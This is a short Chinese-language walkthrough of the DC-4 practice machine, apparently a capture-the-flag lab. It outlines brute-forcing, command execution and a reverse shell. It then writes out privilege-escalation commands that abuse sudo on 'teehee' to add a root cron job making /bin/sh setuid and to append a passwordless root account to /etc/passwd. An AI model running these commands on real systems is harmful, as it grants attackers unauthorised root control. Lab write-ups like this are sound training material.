DC-4

DC-4

主机存活探测

扫描

访问80

爆破http

http登陆

抓包

可以执行系统命令

尝试反弹shell

返回交互式命令行

另外途径

看到三个用户，可以用来爆破

制作字典

ssh爆破

登陆

var/mail看到charles的密码

切换到charles

teehee提权

操作过程如下：

1、echo root chmod 4777 /bin/sh > /etc/crontab
2、sudo teehee /etc/crontab，然后写入的内容：* * * * * root chmod 4777 /bin/sh
（时间部分全部填写为*，默认这个定时任务每分钟执行一次。通过执行的脚本将 /bin/sh 的权限修改为4777，这样就可以在非root用户下执行它，并且执行期间拥有root权限。）
3、ls -la /bin/sh
4、/bin/sh

添加一个admin账户，然后使用teehee执行直接写入 passwd中，然后切换为创建的admin用户

1、echo "test::0:0:::/bin/bash"
2、sudo teehee -a /etc/passwd
3、输入：test::0:0:::/bin/bash
4、然后ctrl+c退出，再su test切换用户，即可获得root权限